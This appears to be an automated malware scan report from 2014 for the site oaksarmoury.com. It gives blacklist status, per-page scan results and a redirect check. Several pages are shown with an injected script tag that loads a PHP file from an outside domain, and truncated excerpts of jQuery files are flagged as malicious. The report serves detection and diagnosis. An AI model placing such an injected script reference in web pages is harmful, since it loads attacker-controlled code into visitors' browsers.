Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oaksarmoury.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oaksarmoury.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://oaksarmoury.com/ | 200 OK Content-Length: 7798 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135162" type="text/javascript"></script> | ||
http://c2.gostats.com/js/count4.js?id=509573 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 16:40:09 GMT Location: http://gostats.com/js/count4.js?id=509573 Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://gostats.com/js/count4.js?id=509573 | 200 OK Content-Length: 519 Content-Type: application/x-javascript | clean |
http://oaksarmoury.com/index.html | 200 OK Content-Length: 7798 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135162" type="text/javascript"></script> | ||
http://oaksarmoury.com/about.html | 200 OK Content-Length: 11748 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135157" type="text/javascript"></script> | ||
http://oaksarmoury.com/gallery.html | 200 OK Content-Length: 20695 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135160" type="text/javascript"></script> | ||
http://oaksarmoury.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 62037 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s) >)[^>]*$|^#([\w-] )$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document /*/a9a007*/ Antivirus reports:
| ||
http://oaksarmoury.com/js/jquery-ui-1.7.2.custom.min.js | 200 OK Content-Length: 21722 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.ui||(function(c){var i=c.fn.remove,d=c.browser.mozilla&&(parseFloat(c.browser.version)<1.9);c.ui={version:"1.7.2",plugin:{add:function(k,l,n){var m=c.ui[k].prototype;for(var j in n){m.plugins[j]=m.plugins[j]||[];m.plugins[j].push([l,n[j]])}},call:function(j,l,k){var n=j.plugins[l];if(!n||!j.element[0].parentNode){return}for(var m=0;m<n.length;m ){if(j.options[n[m][0]]){n[m][1].apply(j.element,k)}}}},contains:function(k,j){return document.compareDocumentPosition?k.compareDoc Antivirus reports:
| ||
http://oaksarmoury.com/js/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 14717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.lightBox=function(settings){settings=jQuery.extend({overlayBgColor:'#000',overlayOpacity:0.8,fixedNavigation:false,imageLoading:'images/lightbox-ico-loading.gif',imageBtnPrev:'images/lightbox-btn-prev.gif',imageBtnNext:'images/lightbox-btn-next.gif',imageBtnClose:'images/lightbox-btn-close.gif',imageBlank:'images/lightbox-blank.gif',containerBorderSize:10,containerResizeSpeed:400,txtImage:'Image',txtOf:'of',keyToClose:'c',keyToPrev:'p',keyToNext:'n',imageArray:[],activeImage:0} Antivirus reports:
| ||
http://oaksarmoury.com/contact.html | 200 OK Content-Length: 10874 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://theohohohs.de/img/uOFjKdQa.php?id=55135159" type="text/javascript"></script> | ||
http://oaksarmoury.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 01 Jul 2014 16:40:22 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://oaksarmoury.com/../js/selectBox/jquery.selectBox.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://oaksarmoury.com/../js/jquery.watermark.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://oaksarmoury.com/../js/fancybox/jquery.fancybox.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://oaksarmoury.com/../js/fancybox/helpers/jquery.fancybox-media.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oaksarmoury.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Jul 2014 16:40:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 7798
Content-Type: text/html
Last-Modified: Sun, 24 Nov 2013 22:23:01 GMT
...7798 bytes of data.
GET / HTTP/1.1
Host: oaksarmoury.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Jul 2014 16:40:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 7798
Content-Type: text/html
Last-Modified: Sun, 24 Nov 2013 22:23:01 GMT
...7798 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: oaksarmoury.com
Referer: http://www.google.com/search?q=oaksarmoury.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oaksarmoury.com
Referer: http://www.google.com/search?q=oaksarmoury.com
Result:
The result is similar to the first query. There are no suspicious redirects found.